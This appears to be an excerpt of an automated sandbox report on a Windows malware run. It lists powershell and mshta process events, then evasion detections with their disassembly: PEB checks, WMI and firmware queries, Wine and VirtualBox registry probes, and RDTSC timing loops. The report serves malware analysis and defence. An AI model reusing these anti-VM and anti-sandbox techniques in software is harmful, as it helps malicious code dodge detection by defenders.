                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                    Query firmware table information (likely to detect VMs)
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeSystem information queried: FirmwareTableInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeSystem information queried: FirmwareTableInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeSystem information queried: FirmwareTableInformation
                                    Source: C:\wOXcVegx\jyidkjkfhjawd.exeSystem information queried: FirmwareTableInformation
                                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\Documents\HJEHIJEBKE.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Tries to detect virtualization through RDTSC time measurements
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: D29357 second address: D28C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 je 00007FD358ED1104h 0x0000000c pushad 0x0000000d add dword ptr [ebp+122D1CBAh], ecx 0x00000013 mov edi, dword ptr [ebp+122D3815h] 0x00000019 popad 0x0000001a push dword ptr [ebp+122D1631h] 0x00000020 add dword ptr [ebp+122D17ECh], ebx 0x00000026 call dword ptr [ebp+122D1D9Eh] 0x0000002c pushad 0x0000002d mov dword ptr [ebp+122D321Eh], esi 0x00000033 xor eax, eax 0x00000035 jmp 00007FD358ED10FEh 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e jnc 00007FD358ED1109h 0x00000044 mov dword ptr [ebp+122D321Eh], edi 0x0000004a mov dword ptr [ebp+122D3975h], eax 0x00000050 stc 0x00000051 mov esi, 0000003Ch 0x00000056 jp 00007FD358ED10FCh 0x0000005c add esi, dword ptr [esp+24h] 0x00000060 stc 0x00000061 lodsw 0x00000063 clc 0x00000064 pushad 0x00000065 mov dword ptr [ebp+122D321Eh], eax 0x0000006b adc ah, 00000073h 0x0000006e popad 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jmp 00007FD358ED1107h 0x00000078 mov ebx, dword ptr [esp+24h] 0x0000007c pushad 0x0000007d or dword ptr [ebp+122D321Eh], edx 0x00000083 mov esi, dword ptr [ebp+122D391Dh] 0x00000089 popad 0x0000008a jo 00007FD358ED10FCh 0x00000090 sub dword ptr [ebp+122D17FDh], edx 0x00000096 nop 0x00000097 push eax 0x00000098 push edx 0x00000099 jmp 00007FD358ED10FBh 0x0000009e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA5446 second address: EA544D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA4463 second address: EA446C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA446C second address: EA4471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA4471 second address: EA448C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD358ED10FCh 0x00000008 jl 00007FD358ED10F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007FD358ED10F6h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA448C second address: EA44B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD358DA46E5h 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA47A2 second address: EA47A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA47A6 second address: EA47AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA48ED second address: EA48F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA48F1 second address: EA48F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA48F5 second address: EA490B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD358ED1100h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA4AA4 second address: EA4AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA4BBF second address: EA4BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA4BC3 second address: EA4BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358DA46E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA4BD9 second address: EA4BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007FD358ED10F6h 0x0000000d jmp 00007FD358ED1100h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA4BF8 second address: EA4C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007FD358DA46E2h 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA66B6 second address: EA66CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED10FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA66CF second address: EA6736 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD358DA46D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FD358DA46DCh 0x00000010 jg 00007FD358DA46D6h 0x00000016 popad 0x00000017 nop 0x00000018 mov si, 0600h 0x0000001c push 00000000h 0x0000001e mov dword ptr [ebp+122D23A8h], edi 0x00000024 call 00007FD358DA46D9h 0x00000029 pushad 0x0000002a jmp 00007FD358DA46DFh 0x0000002f push ebx 0x00000030 pushad 0x00000031 popad 0x00000032 pop ebx 0x00000033 popad 0x00000034 push eax 0x00000035 jmp 00007FD358DA46E2h 0x0000003a mov eax, dword ptr [esp+04h] 0x0000003e jbe 00007FD358DA46E4h 0x00000044 push eax 0x00000045 push edx 0x00000046 jo 00007FD358DA46D6h 0x0000004c rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6736 second address: EA6744 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6744 second address: EA674A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA674A second address: EA6755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FD358ED10F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6755 second address: EA67AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edi 0x0000000c jmp 00007FD358DA46E9h 0x00000011 pop edi 0x00000012 pop eax 0x00000013 add dword ptr [ebp+122D371Fh], edi 0x00000019 mov edi, dword ptr [ebp+122D3700h] 0x0000001f push 00000003h 0x00000021 cmc 0x00000022 push 00000000h 0x00000024 mov esi, ecx 0x00000026 push 00000003h 0x00000028 or edi, dword ptr [ebp+122D398Dh] 0x0000002e push EA5D644Ch 0x00000033 push eax 0x00000034 push edx 0x00000035 jns 00007FD358DA46DCh 0x0000003b rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA67AA second address: EA67B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FD358ED10F6h 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA689B second address: EA68A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA68A3 second address: EA68D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD358ED1104h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov ch, 4Bh 0x0000000d push 00000000h 0x0000000f movzx ecx, dx 0x00000012 push D9FEF1FAh 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a jl 00007FD358ED10F6h 0x00000020 pop ecx 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA68D3 second address: EA694F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 26010E86h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007FD358DA46D8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 add dword ptr [ebp+122D2808h], edx 0x0000002f push 00000003h 0x00000031 mov dx, 32ACh 0x00000035 push 00000000h 0x00000037 or dword ptr [ebp+122D36BFh], eax 0x0000003d push 00000003h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FD358DA46D8h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 0000001Ch 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 push DDEFB6D5h 0x0000005e push eax 0x0000005f push edx 0x00000060 jnc 00007FD358DA46DCh 0x00000066 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6A28 second address: EA6A2E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6A2E second address: EA6A41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD358DA46DFh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6A41 second address: EA6AB6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 6F8B3CF2h 0x0000000f mov cx, DB8Dh 0x00000013 push 00000003h 0x00000015 push ebx 0x00000016 mov edx, 748ABD50h 0x0000001b pop ecx 0x0000001c jg 00007FD358ED1100h 0x00000022 push 00000000h 0x00000024 mov edx, dword ptr [ebp+122D2808h] 0x0000002a push 00000003h 0x0000002c mov ecx, dword ptr [ebp+122D3859h] 0x00000032 call 00007FD358ED10F9h 0x00000037 jmp 00007FD358ED1109h 0x0000003c push eax 0x0000003d jmp 00007FD358ED10FEh 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 pushad 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeRDTSC instruction interceptor: First address: EA6AB6 second address: EA6AE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 jmp 00007FD358DA46E1h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop eax 0x0000001f rdtsc
